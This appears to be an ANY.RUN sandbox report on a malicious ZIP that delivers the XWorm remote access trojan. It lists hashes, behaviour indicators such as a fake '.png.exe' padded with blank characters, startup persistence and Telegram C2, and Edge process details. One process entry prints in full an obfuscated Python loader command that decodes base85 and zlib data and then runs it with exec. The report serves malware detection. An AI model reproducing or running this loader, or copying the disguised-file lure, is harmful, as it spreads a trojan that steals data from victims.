URL:

https://klingaidow.com/Professional_photo_for_you.zip

Full analysis: https://app.any.run/tasks/1ab4f1f3-f8b0-4513-902c-41c1cf1eef5a
Verdict: Malicious activity
Threats:

XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails.

Malware Trends Tracker     >>>
Analysis date: November 24, 2024, 02:56:48
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
telegram
remote
xworm
ims-api
generic
Indicators:
MD5:

FE7BAAD6D2819D86695DF7BC0F532F60

SHA1:

05BF93CCA06E5AE27CDDE75891A71C9DAC93355D

SHA256:

42D8C4F49B050118FA82E41FE16B96CFD9FFC1C03241920A1E0F609150B82EEC

SSDEEP:

3:N8MMjMNFInQg+8KatV:2MNVg+8LV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Create files in the Startup directory

      • pw.exe (PID: 2012)

    • XWORM has been detected (SURICATA)

      • InstallUtil.exe (PID: 5604)

    • Connects to the CnC server

      • InstallUtil.exe (PID: 5604)

    • XWORM has been detected (YARA)

      • InstallUtil.exe (PID: 5604)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • photo_for_you.png⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe (PID: 8148)

    • Process drops legitimate windows executable

      • photo_for_you.png⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe (PID: 8148)

    • The process drops C-runtime libraries

      • photo_for_you.png⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe (PID: 8148)

    • Process drops python dynamic module

      • photo_for_you.png⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe (PID: 8148)

    • Loads Python modules

      • pw.exe (PID: 2012)

    • Reads security settings of Internet Explorer

      • photo_for_you.png⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe (PID: 8148)

    • The process creates files with name similar to system file names

      • photo_for_you.png⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe (PID: 8148)

    • Reads the date of Windows installation

      • photo_for_you.png⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe (PID: 8148)

    • Connects to unusual port

      • InstallUtil.exe (PID: 5604)

    • Executes application which crashes

      • mp4.exe (PID: 5432)

    • Contacting a server suspected of hosting an CnC

      • InstallUtil.exe (PID: 5604)

    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • InstallUtil.exe (PID: 5604)

    • Possible usage of Discord/Telegram API has been detected (YARA)

      • InstallUtil.exe (PID: 5604)

  • INFO

    • Application launched itself

      • msedge.exe (PID: 2972)
      • msedge.exe (PID: 6716)

    • Checks supported languages

      • identity_helper.exe (PID: 6444)
      • identity_helper.exe (PID: 7632)
      • photo_for_you.png⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe (PID: 8148)
      • pw.exe (PID: 2012)
      • InstallUtil.exe (PID: 5604)
      • mp4.exe (PID: 5432)

    • Reads the computer name

      • identity_helper.exe (PID: 6444)
      • identity_helper.exe (PID: 7632)
      • photo_for_you.png⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe (PID: 8148)
      • mp4.exe (PID: 5432)
      • InstallUtil.exe (PID: 5604)

    • Reads Environment values

      • identity_helper.exe (PID: 6444)
      • identity_helper.exe (PID: 7632)

    • The process uses the downloaded file

      • msedge.exe (PID: 2972)
      • msedge.exe (PID: 7712)
      • WinRAR.exe (PID: 7840)
      • photo_for_you.png⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe (PID: 8148)

    • Reads Microsoft Office registry keys

      • msedge.exe (PID: 2972)

    • Executable content was dropped or overwritten

      • msedge.exe (PID: 3524)

    • Manual execution by a user

      • photo_for_you.png⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe (PID: 8148)

    • Reads the machine GUID from the registry

      • InstallUtil.exe (PID: 5604)
      • pw.exe (PID: 2012)

    • Creates files or folders in the user directory

      • pw.exe (PID: 2012)

    • Process checks computer location settings

      • photo_for_you.png⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe (PID: 8148)

    • Sends debugging messages

      • mp4.exe (PID: 5432)

    • Disables trace logs

      • InstallUtil.exe (PID: 5604)

    • Checks proxy server information

      • InstallUtil.exe (PID: 5604)

    • Reads the software policy settings

      • InstallUtil.exe (PID: 5604)

    • Attempting to use instant messaging service

      • InstallUtil.exe (PID: 5604)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
200
Monitored processes
69
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs winrar.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs rundll32.exe no specs photo_for_you.png⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs pw.exe msedge.exe no specs mp4.exe addinprocess32.exe no specs #XWORM installutil.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs werfault.exe no specs msedge.exe no specs msedge.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
556"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2420 --field-trial-handle=2220,i,15410932170991593848,7011793361797548853,262144 --variations-seed-version /prefetch:3C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
640"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2680 --field-trial-handle=2220,i,15410932170991593848,7011793361797548853,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1344"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2232 --field-trial-handle=2248,i,5499721263717546161,16933645744528733540,262144 --variations-seed-version /prefetch:2C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1684"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3352 --field-trial-handle=2220,i,15410932170991593848,7011793361797548853,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1792"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=6100 --field-trial-handle=2220,i,15410932170991593848,7011793361797548853,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2012"C:/winnit/pw/pw.exe" -c exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode('c$|eeS#sM*mfW;hmR+vB?5gf6wU!p8mIok3N(${H0j>avoy?e)3?LzbL;?gsa5d#0cgOV4e9R51KKmAPf;j+hP*<3*NkDSD+7UBD2J*eke7U?eGoK#f7f81a39-5f63-5b42-9efd-1f13b5431005lt;d?wT75)ZJG!lUk7)25A0HYup!Wf8!Fb?7&On^iPm%vg8m%(xfSHMaLSHWrspMWPJTmx$%d<ve1a2>3N@ELf9VGKRDKLejdgEiwQX1@S0LOg*!x4!^i*k6J#!}=2X%KjRB9pcOA8~a=EZHTX+@9dZ0rTq%LvcCu4hi$9q2m5#6cOm`+{oei&{21bE=qGyvY}kJQf3P>fro9EW>}{|e_B};A_8-9??Om{ICqWXots8srnXz}5fY0G)e@TFS_yT_Zmk9V1`~rT7;Q{;#evRR4_znCP!+(L_!Iu~kM(pPo@YOF-K*I0g54a^|5bf7f81a39-5f63-5b42-9efd-1f13b5431005gt;f`922HM#@OPkK);*LL~Y7Ujq%Wf7f81a39-5f63-5b42-9efd-1f13b5431005gt;`#9-7{3*xYc`(W9WXT=itUCTJ{hcdJh`O*dj47RdVsv)hu|Ix;1T8#}tW%>YErYKa#~4@oP$0Bnp&}UaU2$d4asGUsDZC66b|$48F*FQ`eUq*X#Lsp@QnG$)&~exZ^;C7E9XHGwv2&KkjDebb@Jbwc*{J;Vo9&UdQn<@>D6aw8ZAcR)fN8E)|qIUsx<D`O-DNNJwQ?T&z6|ochLKvFsWC&~x<YZ_F;h<M_)5rniO*Kk{>Q9{B}}<?m58;CF^P+F~tW%yvCvFi1wduQ1);Bi>64{(JRo;CmgXec^qFtIvXIVz^j~hIKvmo3&Q(xB6kN{|eXgqcHj&|L<ckb{}s??h_9!g~*?OykDBf=dt<H%gDEpd33(y$L6@_n@CWH7~TiH@t2VYnpiA=XF)A~7U@5Su|(v43DZRIT(9q!=SwjDIPN#|{(tk#6F<l2%k$Vn-viylsF#szETw3qf9NOXiT8mSCD>mBd3ph_zXpQE8cm?iz+WtRs?#<Wab!4)Wz}^J2L?LEN=dFP5)dnY5x0!#A}TDR-9@}N^cT_2BB7hA7fSh|c!i5a+|v&~3j`R{)}smhUyuD1{UN#<U5%|rUqoL;w=nJ{Kb8K{;}=T*5Et_>y!<uxGIAfoI1Vx)9`_^N=sb!`%r%Vtd;C5TN+BNDL^96)`Xb;gx>$00j&39q-b%PF#~3eGnR<b`rLLQc6>KkofhU)|KLlIf42u1La82*Hrs4U<#9u5w;GeSiR5b>-j}!bD>~=L|bv^n;6q^<KDPyt6=o$YY6+iNCkvnWgF!q;K9~*OEPJxky+y5u)k3U-Fm%-32T(q%N{`~x3WB1r1=dr&<0y+FG^8QiZ{}JoQgomACF9^1Vy)O2e@ctNVJF5LX`oQQ%R@Tk}{RggdvHig{wj#4{Cq3`=8S3dO8eF{oNRy0t8^N$AhBLGc5BolD`6$3}-ouZkfM?nIFzc(Rcl4=b;=fh-t4HVdV_2EdU+_O*@#n;YvwPo!_Ub(eX8%)AtcCmU*ly4BZ?SQDuS0&r?cn(5bw)vG3aoa`8>qMciz<VzM^y$w8U%`Z5vcL>)6G7M{3a63A|E5seGGek495s;ga5GD1javD?2;d!Cva?tVJ{Dkz*yM2g7FxPhxjVS<1i88Pq4o(&7WZEHGgToHebcqQ-68>biRVI_4ztBlO@*sKHy<5@Z_I@f(V#jSuAVnz{norBjGsn5bMJ*7jhF?W~hYF`I65TUk232nOnmNDB*4B=${25`K|aq`w&?_P&~)<fxtf0KMzKHYzxLb3tZ$MO^bCrh1PK%J6CXsctEg$JRkviI4)@UIPO_M`LX)^QB#i#f2z#q=2Y`K@Pj@B;S2)q*J7(U2CYZe;(?O}F!(289)mm8|HR%~69~U1ka=E$6|s{OB!X&7bfqF&w8RU!8ZTRZNW;0TAR$_(=n7}iIe}nvk|gJJTlVV3lRisxGsbppP(oRmIw{vkb0E)9OBRmDFhyq=TkdeSD>D}K>I&+EluU^B<S^f*k!GKyWJk`*1y<1<mS!l~79DBKA-O9d7E`t|s^Z#;lPjqdknomNkoTv0n)Wp(m)C56%y#7pKLe;`XKJ!VR5iH*0O^hyf|Lw}1iFMOGL0-9A>WXs3GeVuZN_(10`ydi7*`2IC`DfeG^~kEuE7u|Q%Ru<9O+67kx>*HTH>{vtCBjw+Y_WoV62FUl_>((Wkn|SNvjJoOcM-sLiY7$WeifV(Gtx*tGE-0_oz|kfT43EqgnAmk!-b`>xoYI#XJHOYq2GPf@Mj{%%JSDqRp~!28QBH9~sg((@IUOdeLOrQYDRf^q?*GHDx?uot6hs1=Q(YTA<l3Uu==kqBCl#T~$TS(`6)pv`Y&Xs7e-aG^$O?GrGcer9%O=Cye4sI%ORK5tI}ew^KCFNtK*Npgbqh1Cg4{beYc>f-lvjldjQrIlPwvi(Fb)us%~6B#<<r5&qODQHN5qO(<5Sq}hOA(sWTMK~uJYEegJ=7GxRPsMR7XWkrIHp0*|;flMHs(D}}ZC|m8ZAfq9ZLb4(8j+C-8qC=%w3+1aRiGUL3%K?fixh0T>iX^cvFPn8J(@d3QN1!Mjigv|r5zM${lZ1rYRR;6JQxgYFPa0fPrbLG(I7e1MlkKvzT-s=|t|H4Ni1)<g2NO8;eI^A5wUl2_niZ38!m*s9GOEPSq(UwyD`Zg~yBSfU3reA!(ImdhB5ML>Ajc9XLs%rnqD69Q(a-WUZShK`0h$bH6u68|3^K5b=ah4;I_3AVj7+hF#++Rq>9#b^JKPvjERrl@ViYSSCN*)HnOS6uND)bS$Twxja7>O<kj0dENfX(bM!8t07AdE}2-+Nh{mWKt*W^)qD$sJDnK4zystj6InP4c^QLxV%3Xx(IJ}poud3J`<oa|C+(HtpFCL<AJLUdq-FY#kBoog8~Vz6)Utr?(T8rwHTkXRNJGj_2aWmln*sY#O*E1FXdp}bn+Iet1w<7EV+3sq2bOPXjpyj7u<0;s4nYOGRaQnM?pCPG0Md{9gADaqCesbr?|cE;38l}=sBq;(=g$PU}X&R1!r`2sKLW8E5OfLI=}l0Op^-_@G3sF7@sDZ(m1xh79mY%#^taF#0o649Jk_Shy>WlH))=(fq0Wip!8n$}2Wq9_QlO?QU(-%yJ#rBHfWE`biVld(pdEsiuP&Y?Xa%_Fr)c2(@Rno~)!)&%>yEY>+!)rutGDc@D|CsU1<%fc*23bb5484c-acd3-5883-ae5d-000aa204eed3
sk+2)U{`$QHY3R!h4Q6wQ<%_%uLfjg#q&U=abG4-gv53bZr?WTwgYv7SqLn;aQMz$wz0(8RW<*rdZFx}_pB&snS|Dixbcvvrm-tFmO$h9ae8=|Q)ej7ADY%POkWgd#JNWxh~NWo)I{stU8~4CA;Bp(zWHl5?!>syuRgOjEYmB3tH2zONLZ$B|$NyR6HmvA+ho?VL0un=La4+ENLLLWx&Js*L4eb_LEINFp-@k~!AXCZl5C<;6-<k|a_qo?y96(z*g1tPhzfF*BK%aBSCfMM|zh5=ra~G>w9lW+_mD)Fj6dAT2n&l((>rrO1Inkw|Rjn(FkV##$LcQ6`pBG-)mc0WZ<MuJAIBdsa(=1IDS0M1tlxS+=EF*%Lb_W!2)F^#Y&f($^`NDpy4djanj<q2*5iMUp(#%kUPN$G$CVC7A;fIh2T#Y)fj-Bm(u+Qh6ezcuqrnMk>*@x(tv!_3Kp<jex}u`2v`!V;Ar?%5V;n)ihhtQWHiLsd2rDxg)T4MbwogIKlHxIAt)_Q@#mo;3yVyfnu6^@pz^w*gvS_sjOr;?5kte@~OPdrgX7Fsz?rOIWIXC(CSJgpuvQtDh+XFc10?a#hy`A(`Fr5lLkYg7MQ_2KrpLVWD1fwNsuZmwB3eb0fCnetD16B(k;_fEwfn9ALIDy76fX5V{dr|oYoj3RuYPGi6M>;CCMyGj+v@U?Fm3UEvL<Ly+|sCWg^`vld6-eDFt>4IM;-Po`E9XR{_;|k{(G8Ly9!Y>d16~P0C^uWbt`kWGtS>c2bckAaj!6l1kVI)7N7`1hj%L4-KyOaOaTZI-mc)?j+~u|MX~BdVFt$7u6Ilf{Q4M+($zg+^VBL$HI#%epm(%CqMB%@=GjuM!k;&ISzcmjIrS>5kC-DY}Ff>Dt`0(Qx`wdm#{U!!D5{rI${1n#I1{!HtK2kt&m&-&x2><ZTPAW?`UjrJ*$Uz?Xa<@bq(DI>&8SkhM4jW&-3X;ZrK|;j^PzPysd%@`SajXE(RC2zhVaUt*fL$-syu@EjjLN8EU%N%JoHe)J>JWI?%Ud_U>Z4a#2swZ7%6=kI36QC>3w-@2)hUHr~`OyIa=r%~kfec$q7<GW~6Kys_o@Z&N9BI2pE1`>m^+dZ#q0<?@rv=|%2MkK*r;#!|%Y`Q7khaD3jq=oL4Q(&pj#e*d6fpzEb~HQ9HrpntN-`0(hBe{?+7ru$WAFypdXr3Oo#ql&^nvvX>R5<b)B#fkdnxO+W1<Zk!w&iii;YFGF7r#GTXTy5&8Su_f)O{jhQF89`Y+f};#`a%6dlCQS-WOHN>`&-RyYtlYsh^wtBF-g5W+e+>G!@<rLTiY#W@=Qu`tL@t>N%1Adwa8jgolBJl?6&M1sd?P0HYabvAbk%H3~Smhuf7f81a39-5f63-5b42-9efd-1f13b5431005lt;Fik9SaMW3RNE%$_S%Scj=@<>>ky$s|W(b#rzwuMA7$o9kYyv7@({q1egHhxhMFo3r`OpwNS}Gn*djBVzBMc~hI0O58=o-nyPyJ2!*IX}PWDQF42@QE+-AXSnUS=JlJKvV6$AJ2=&P=`t#?pw^eq4gHL2x1{WNW7oQDoY`Wwm9pQS?2gn<t9opmB==QScei&c7xunOzAL{`GqQrVy8Rs-CER;f-tQa@&VWADZj$x#*}<r`v$r#^998d{wWjTLFD0;hd!qG5wQ^=^3-9!kZ9^4ZC7H~(8q<6JVDE}|-|SBdBfCiKx24kgW_8Z=#}w<H(KBOTuHVf@o0I*1v%0Sp?|08DRkoOCyW_nUe_&TrY=w6=<-PKlE~|r?pLGN_dvsN;pJ&J85ph=)PeysUa7;?(=EinOPo7?#9*e|j@_Jmz?%$qPT4HT(?qvPWyXJv)tXqP!byG>QgrjbQ+~8D@$l~s8mh!g77KLiCvE6#N0r$_}nf#%AD3nv@2H@W|IQs6oPRs>;uR~Zix<1}GsqaALnh|=EKJ~M*zP;D++=ete7;X+q8%IX({N%J*+qt_}F3qbNs>A)a?$9gt72E0Ui<i?>e(&w63$OD2h4gM)yI}STUDz`isehk4ED=(6ws8daE%T60?b~XRvy;;Gv^y@Ma{YR+T`u8wg@vCt>Auq7sZ!IG#Jzf>Gk?oSmuK>AvYKs+l(5y}^V7aPA5D+Wo%72LPn~b?Z=Sl>Vs6j4bxEi>7rW<qdas4vnTC6Cc;HAHRPKeH%ggifjXro=?6t+LuU+&IvqQF~^Bzc_?V6r>+a>NPb}!=`zw5jy<u;ST>3)$%jfvJPGG~6udsk1U4u~B(cc_*Kbzbu(^UGawe{Vc3pIUCNd)Dvo^tc<=OhO$Ylhn8(cSpycwgL7K=II|wT)bnuWU?rnwNJY*yzs>Hulf)Q?RwC_b!QYnH^ERn|3*KbC`!jrBj^rdSWwMf4h4v?+CR^<$S+-WT&`oX8+u&WzU9O3){85>!@C`w*e0dFo^r7`n$XG{`h?RPUX@EN4eyvdbfSVqMmb;@Aj0Lc;a~NBjN&N<%^5^bRO>2oRNN`I+i!$3iy^#OCPhXX?g2<*gB|Why2y#?$X}k#%gVY_V%5+1^kOEqi9}U$jn<6)n;mu-7Fn+=S2k`pKsiz+w8{q8@+PPBo7y{-T)-JgP!AE;Lr?K27T1=jWk#um_xsVz^Z5ThsMCiRKXFkh<OHBnRVQ|4l)+8P7kc&L&ESowy{VAx$4E*V5qrXPd5ew@7rL?Cu2h!^mNPcz2K1ZV&OWbIxta3^MZtomk66&)eoD3;}3l2PSt@!z7CEY{WUba*N@o{Z#g(%o`u=%-s}8BQYc8VdBH&wrk55k9(x-@4R!RYF%5G~U~SxS(y1`D;5`kGDLp(Az4c&ZkRI}$2St$m^nxTL`0Rn;H6Hjt`FYUwMNkA8y)c*dke^BZbABdF*96%K?<6RKV{efN_y6&v{CHfhp4mM(M8-uRph1xKaKm)ui!j^qRapLj;TN&h*y@YbrPcUqeC_3GbZu!p_CGG-aUl'))))
C:\winnit\pw\pw.exe
photo_for_you.png⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe
User:
admin
Company:
Python Software Foundation
Integrity Level:
HIGH
Description:
Python
Exit code:
0
Version:
3.10.11
Modules
Images
c:\winnit\pw\pw.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\ucrtbase.dll
2496"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.3636 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=3768 --field-trial-handle=2220,i,15410932170991593848,7011793361797548853,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2572"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.59 --initial-client-data=0x300,0x304,0x308,0x2f8,0x310,0x7ff819115fd8,0x7ff819115fe4,0x7ff819115ff0C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
